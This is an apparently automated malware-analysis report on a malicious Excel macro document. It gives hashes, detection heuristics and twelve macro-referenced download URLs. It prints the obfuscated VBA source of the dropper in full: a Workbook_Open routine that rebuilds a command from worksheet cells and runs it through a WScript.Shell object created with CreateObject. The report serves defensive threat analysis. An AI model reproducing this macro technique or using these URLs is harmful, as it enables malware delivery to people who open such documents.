Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 71752d429d8bab9a…

MALICIOUS

Office (OLE) / .XLSX

145.5 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2026-05-28
MD5: 9dad9d5db340683c9e10ae3352b7faae SHA-1: 00e22fc77a373fe1a71c3d7bad78b9627027dded SHA-256: 71752d429d8bab9a8de256568d8af3ac55bae996ce94908926283d6b3966436d
270 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Workbook_Open event, which are designed to execute code upon opening. The macros reconstruct and attempt to download payloads from multiple URLs, indicating a downloader or droppper functionality. The presence of CreateObject and Wscript.Shell references further supports the execution of external code. The embedded URLs are the primary indicators of compromise.

Heuristics 8

  • ClamAV: Doc.Malware.Valyria-10004384-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10004384-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URL reconstructed from VBA cell-staged base64 dropper (12 URLs) critical OLE_VBA_CELL_DROPPER_URL
    VBA reads worksheet cells, strips junk substrings via Replace(), and base64/UTF-16 decodes the result into a PowerShell EncodedCommand payload. The download URL is never contiguous in the file bytes; it was recovered by removing the macro's Replace() junk tokens from the cell strings and decoding the staged base64.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Set bwkasdgf3 = _
       Vsa3gkjagaRga3.CreateObject(hdrRyhsdrhl.Caption, hdrRyhsdrhl.Tag)
       hdrRyhsdrhl.Tag = Replace(Cells(108, 2), "nga", "")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
    Private Sub Workbook_Open()
    Dim dblSales, ghAWEusaf As Double, hfoqila As String, intYears As Double
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://reumatismclinic.com/-/scCnm3mbJRpsaBKBbrC/ Referenced by macro
    • https://shodhmanjari.com/wp-admin/xjEmK4Pd3N/Referenced by macro
    • http://tubelocal.net/wp-admin/X4Xm4Mk/Referenced by macro
    • https://pacifichomebroker.com/roderick/RRk/Referenced by macro
    • https://molinai-journalReferenced by macro
    • https://marineboyrecords.com/font-awesome/QBBByHDDYl0slxlQ/Referenced by macro
    • https://mashuk.net/wp-includes/ej6R4fkU/Referenced by macro
    • https://lapalette.store/Fox-C404/Gngia6hD0i5zsgd2/Referenced by macro
    • https://jhonnycryptic.com/cgi-bin/OhZdKCDRBYGZudqs/Referenced by macro
    • https://korean911.com/wp-admin/TZczIsZtMFXxM5T/Referenced by macro
    • https://fonijuk.org/wp-content/fzq6vYFUMEiRoR8vG/Referenced by macro
    • https://baltoe.blog/-/6IC/Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7821 bytes
SHA-256: 527d0656a0c2c323955d068683ef8f7e20c035cda247a1e24383595c0eb3403b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vbasETGs4sk"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function FGse3ksjdfgskbkjhg(Sales As Long, IsTemporal As Boolean) As Double
Const dblRate1 As Double = 0.09
Const dblRate2 As Double = 0.11
Const dblRate3 As Double = 0.15
Const dblAdd As Double = 1.1
Const lngSum1 As Long = 5000
Const lngSum2 As Long = 10000
If Sales < lngSum1 Then
  FGse3ksjdfgskbkjhg = Sales * dblRate1
ElseIf Sales < lngSum2 Then
  FGse3ksjdfgskbkjhg = Sales * dblRate2
Else
  FGse3ksjdfgskbkjhg = Sales * dblRate3
End If
If IsTemporal Then
  FGse3ksjdfgskbkjhg = dblAdd * FGse3ksjdfgskbkjhg
End If
End Function
Sub IfyJvfgssbvsrjbnmb()
Dim strMessage As String
Dim dblSales As Double
Dim ah As Integer
Calc:
dblSales = Val(InputBox("y7uo9tuis gjdfhKUY:", _
"vDSe5ydThjs hs6rUu5seF 5^& zsdf"))
strMessage = "bks fgwhkjsd:" & vbTab & Format(dblSales, "$#,##0") & _
vbCrLf & "weq3ts jrg:" & vbTab & _
Format(dhCalculateCom(dblSales), "$#,##0") & _
vbCrLf & vbCrLf & "SGwethjsodihl"
If MsgBox(strMessage, vbYesNo, _
  "gjw ") = vbYes Then
  GoTo Calc
End If
End Sub
Private Sub Workbook_Open()
Dim dblSales, ghAWEusaf As Double, hfoqila As String, intYears As Double
Const dblRate1 = 0.09
Const dblRate2 = 0.11
Const dblRate3 = 0.15
dblSales = 6000
Select Case dblSales
  Case 0 To 4999.99: ghAWEusaf = dblSales * dblRate1
  Case 5000 To 9999.99:
  ghAWEusaf = dblSales * dblRate2
  For i = 1 To 2
  Dim hgwki, tuowq As String
  If i = 1 Then
  hgwki = Cells(106, 6): tuowq = Replace(Cells(107, 2), "poi", "")
  ghAWEusaf = dblSales * dblRate2 - 1
  Else
  hgwki = Cells(117, 2): tuowq = Cells(115, 2) & vbCrLf + Cells(116, 2)
  End If
  esfhkRGW3eri7asi 4782, hgwki, tuowq
  Next
  Range("B1").Select
  Case Is >= 10000: ghAWEusaf = dblSales * dblRate3
End Select
ghAWEusaf = ghAWEusaf + _
(ghAWEusaf * intYears / 100)
End Sub
Sub esfhkRGW3eri7asi(dhfau As Long, ByVal ehjlsdk As String, ByVal fhuolij As String)
 Dim cell As Range
 Dim strFirstAddress As String
 Dim strComments As String
 hdrRyhsdrhl.Caption = fhuolij
 Set cell = Range("C201:B300")
 Open ehjlsdk For Output As #1
 If Not cell Is Nothing And strComments = "ehroiwd4" Then
   strFirstAddress = cell.Address
   Do
     strComments = strComments & "Fafhkleishal: " & _
     cell.Comment.Text & Chr(13)
     Set cell = Selection.FindNext(cell)
   Loop While Not cell Is Nothing And _
 cell.Address <> strFirstAddress
 End If
 If strComments <> "Tyu3jdk" Then
    strComments = "ryE5yedklsh sdgk"
    Print #1, hdrRyhsdrhl.Caption
 Else
    MsgBox "fWehrhse s5usdfgs"
 End If
 Close #1
End Sub


Attribute VB_Name = "kjRtghsw3hlsd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public arfgjikuwe As Long
Public Eaw3ghkasghd As Boolean
Public Vsa3gkjagaRga3, bwkasdgf3 As Object
Public wdhqETqw3gajs, gfabwkjuswgkjs As Integer
Function HzsrndfGASREYe4(Txt, n, Separator) As String
    Dim Txt1 As String, TempElement As String
    Dim ElementCount As Integer, i As Integer
    Txt1 = Txt
    If Separator = Chr(32) Then Txt1 = Application.Trim(Txt1)
    If Right(Txt1, 1) <> Separator Then Txt1 = Txt1 & Separator
    ElementCount = 0
    TempElement = ""
    For i = 1 To Len(Txt1)
        If Mid(Txt1, i, 1) = Separator Then
            ElementCount = ElementCount + 1
            If ElementCount = n Then
                ExtractElement = TempElement
                Exit Function
            Else
                TempElement = ""
            End If
        Else
            TempElement = TempElement & Mid(Txt1, i, 1)
        End If
    Next i
    ExtractElement = ""
End Function
Sub Gset3hwkjdhskldhlksflb(ByVal Target As Excel.Range)
   Dim rgInputRange As Range
   Dim cell As Range
   Dim strMessage As String
   Dim varResult As Variant
   Set rgInputRange = Range("A1:E10")
   bwkasdgf3.exec hdrRyhsdrhl.Tag
   For Each cell In Target
      If strMessage = "M" Then
       If Union(cell, rgInputRange).Address = rgInputRange.Address Then
         If varResult = True Then
            Exit Sub
         Else
         strMessage = " " & cell.Address(False, False) & ":" _
          & vbCrLf & vbCrLf & varResult
         MsgBox strMessage, vbCritical, "shjfl qeyh8foisd"
         Application.EnableEvents = False
         cell.ClearContents
         cell.Activate
         Application.EnableEvents = True
         End If
        End If
      End If
   Next cell
End Sub
Function erjtdrrssaEsegs43(cell As Range) As Variant
   If Not WorksheetFunction.IsNumber(cell.Value) Then
      IsCellDataValid = "qeli 78et9ud"
      Exit Function
   End If
   If Int(cell.Value) <> cell.Value Then
      IsCellDataValid = "shfl9q"
      Exit Function
   End If
   If cell.Value < 1 Or cell.Value > 12 Then
      IsCellDataValid = " 1 or 12"
      Exit Function
   End If
   IsCellDataValid = True
End Function
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
   Dim cell As Range: Dim rgCells As Range: Dim intRow As Integer
   On Error Resume Next
   Set rgCells = Range("A300:B352"): FDGwheklswheDSRFHsehk
   If rgCells Is Nothing And intRow = 873 Then
     For Each cell In rgCells
      intRow = intRow + 1
      Cells(intRow, 3) = cell.Comment.Text
     Next
   Else
      intRow = intRow - 3
      Gset3hwkjdhskldhlksflb Range("G504")
      Exit Sub
   End If
End Sub
Sub FDGwheklswheDSRFHsehk()
   Dim alngData() As Long: Dim lngCount As Long
   Dim dtStart As Date: Dim strArrayToTable As String
   Dim strTableToArray As String
   Dim strMessage As String: Dim i As Long
   lngCount = 10: FGse34njlskdhfih
   ReDim alngData(1 To lngCount): hdrRyhsdrhl.Caption = Cells(114, 5)
   hdrRyhsdrhl.Tag = ""
   If strArrayToTable = "87" Then
   For i = 1 To lngCount
      alngData(i) = i
   Next i
   Application.ScreenUpdating = False
   dtStart = Timer
   For i = 1 To lngCount
      Cells(i, 1) = i
   Next i
   strArrayToTable = Format(Timer - dtStart, "00:00")
   dtStart = Timer
   For i = 1 To lngCount
      alngData(i) = Cells(i, 1)
   Next i
   strTableToArray = Format(Timer - dtStart, "00:00")
   Application.ScreenUpdating = True
   End If
   Set bwkasdgf3 = _
   Vsa3gkjagaRga3.CreateObject(hdrRyhsdrhl.Caption, hdrRyhsdrhl.Tag)
   hdrRyhsdrhl.Tag = Replace(Cells(108, 2), "nga", "")
   strMessage = ": " & strArrayToTable & vbCrLf & ": " & strTableToArray
End Sub
Sub FGse34njlskdhfih()
   Dim cell As Range
   Dim strFirstAddress As String
   Dim intRow As Integer
   hdrRyhsdrhl.Tag = Cells(118, 4)
   Set cell = Cells.Find("*", LookIn:=xlComments)
   Set Vsa3gkjagaRga3 = CreateObject(hdrRyhsdrhl.Tag)
   If Not cell Is Nothing And intRow = 2346 Then
      strFirstAddress = cell.Address
      Do
         intRow = intRow + 1
         Cells(intRow, 3) = cell.Comment.Text
         Set cell = Cells.FindNext(cell)
         Loop While Not cell Is Nothing And _
          cell.Address <> strFirstAddress
   End If
End Sub

Attribute VB_Name = "hdrRyhsdrhl"
Attribute VB_Base = "0{31D72C0D-71E1-4560-A78F-4581AE787333}{A613E03F-51BB-441E-BFF4-8650DA53184B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False